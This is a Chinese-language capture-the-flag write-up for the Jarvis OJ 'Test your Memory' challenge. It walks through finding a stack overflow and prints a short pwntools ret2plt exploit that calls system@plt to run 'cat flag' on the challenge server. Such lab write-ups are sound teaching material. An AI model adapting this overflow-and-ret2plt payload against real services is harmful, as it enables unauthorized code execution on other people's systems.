Jarvis oj Test your Memory writeup

简单的ret2plt

在这里插入图片描述
检查下防护,只开了NX。
Jarvis oj Test your Memory writeup_第1张图片
放ida里:
Jarvis oj Test your Memory writeup_第2张图片
问题出在mem_test函数里:
Jarvis oj Test your Memory writeup_第3张图片
点开hint,发现了有"cat flag"这个字符串:
在这里插入图片描述
在这里插入图片描述
而且还在rodata区里,那直接硬编码就可以了。
Jarvis oj Test your Memory writeup_第4张图片
程序本身调用了system函数,那直接ret2plt就行了。
根据ida计算出溢出点:
Jarvis oj Test your Memory writeup_第5张图片
溢出点0x13+4。
编写exp:

from pwn import*

a=remote("pwn2.jarvisoj.com","9876")

system_plt=0x08048440

payload='A'*23+p32(system_plt)+p32(0x080485bd)+p32(0x080487E0)

a.recvuntil("> ")

a.sendline(payload)

a.interactive()

这道题返回地址随便写个无效地址会出现读不出来flag的问题,还是找个有效的地址,优雅的读取flag。。。
Jarvis oj Test your Memory writeup_第6张图片

你可能感兴趣的:(pwn,Jarvis,OJ,pwn题目,wp)